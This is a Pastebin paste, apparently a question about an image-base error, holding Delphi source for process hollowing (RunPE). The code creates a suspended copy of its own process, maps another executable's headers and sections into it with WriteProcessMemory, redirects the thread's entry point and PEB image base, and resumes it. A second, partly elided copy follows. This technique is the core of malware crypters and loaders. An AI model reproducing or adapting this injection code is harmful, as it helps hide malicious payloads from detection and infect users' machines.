Don't like ads? PRO users don't see any ads ;-)
Public Pastes
Guest

Untitled

By: a guest on May 10th, 2012  |  syntax: None  |  size: 2.35 KB  |  hits: 15  |  expires: Never
download  |  raw  |  embed  |  report abuse  |  print
Text below is selected. Please press Ctrl+C to copy to your clipboard. (⌘+C on Mac)
  1. Imagebase error in Delphi EXE
  2. {$R *.dfm}
  3.  
  4. procedure TForm1.Button1Click(Sender: TObject);
  5. var
  6.   i: Integer;
  7. begin
  8.   FS := TFileStream.Create('calc.exe', fmOpenRead or fmShareDenyNone);
  9.   SetLength(eu, FS.Size);
  10.   FS.Read(eu[0], FS.Size);
  11.   FS.Free;
  12.   SInfo.cb := Sizeof(TStartupInfo);
  13.   CreateProcess(nil, Pchar(paramstr(0)), nil, nil, FALSE, CREATE_SUSPENDED, nil,
  14.     nil, SInfo, PInfo);
  15.   IDH := @eu[0];
  16.   INH := @eu[IDH^._lfanew];
  17.   imgbase := DWORD(VirtualAllocEx(PInfo.hProcess,
  18.     Ptr(INH^.OptionalHeader.ImageBase), INH^.OptionalHeader.SizeOfImage,
  19.     MEM_COMMIT or MEM_RESERVE, PAGE_EXECUTE_READWRITE));
  20.   ShowMessage(IntToHex(imgbase, 8));
  21.   WriteProcessMemory(PInfo.hProcess, Ptr(imgbase), @eu[0],
  22.     INH^.OptionalHeader.SizeOfHeaders, SIZE_T(btsIO));
  23.   for i := 0 to INH^.FileHeader.NumberOfSections - 1 do
  24.   begin
  25.     ISH := @eu[IDH^._lfanew + Sizeof(TImageNtHeaders) + i *
  26.       Sizeof(TImageSectionHeader)];
  27.     WriteProcessMemory(PInfo.hProcess, Ptr(imgbase + ISH^.VirtualAddress),
  28.       @eu[ISH^.PointerToRawData], ISH^.SizeOfRawData, SIZE_T(btsIO));
  29.   end;
  30.   CONT.ContextFlags := CONTEXT_FULL;
  31.   GetThreadContext(PInfo.hThread, CONT);
  32.   CONT.Eax := imgbase + INH^.OptionalHeader.AddressOfEntryPoint;
  33.   WriteProcessMemory(PInfo.hProcess, Ptr(CONT.Ebx + 8), @imgbase, 4,
  34.     SIZE_T(btsIO));
  35.   ShowMessage('Press ok on ENTER');
  36.   SetThreadContext(PInfo.hThread, CONT);
  37.   ResumeThread(PInfo.hThread);
  38.   CloseHandle(PInfo.hThread);
  39.   CloseHandle(PInfo.hProcess);
  40. end;
  41.        
  42. {$R *.dfm}
  43.     {$R test.res}  //extra resourse added
  44.  
  45.         procedure TForm1.Button1Click(Sender: TObject);
  46.         var
  47.           i: Integer;
  48.         begin
  49.           FS := TFileStream.Create('calc.exe', fmOpenRead or fmShareDenyNone);
  50.           SetLength(eu, FS.Size);
  51.           FS.Read(eu[0], FS.Size);
  52.           FS.Free;
  53.           SInfo.cb := Sizeof(TStartupInfo);
  54.           CreateProcess(nil, Pchar(paramstr(0)), nil, nil, FALSE, CREATE_SUSPENDED, nil,
  55.             nil, SInfo, PInfo);
  56.           IDH := @eu[0];
  57.           INH := @eu[IDH^._lfanew];
  58.           imgbase := DWORD(VirtualAllocEx(PInfo.hProcess,
  59.             Ptr(INH^.OptionalHeader.ImageBase), INH^.OptionalHeader.SizeOfImage,
  60.             MEM_COMMIT or MEM_RESERVE, PAGE_EXECUTE_READWRITE));
  61.           ShowMessage(IntToHex(imgbase, 8));
  62. .....
  63. .....
  64.        
  65. ..
  66. FillChar(SInfo, SizeOf(SInfo), 0);
  67. SInfo.cb := Sizeof(TStartupInfo);
  68. CreateProcess(...
  69. ..
create a new version of this paste RAW Paste Data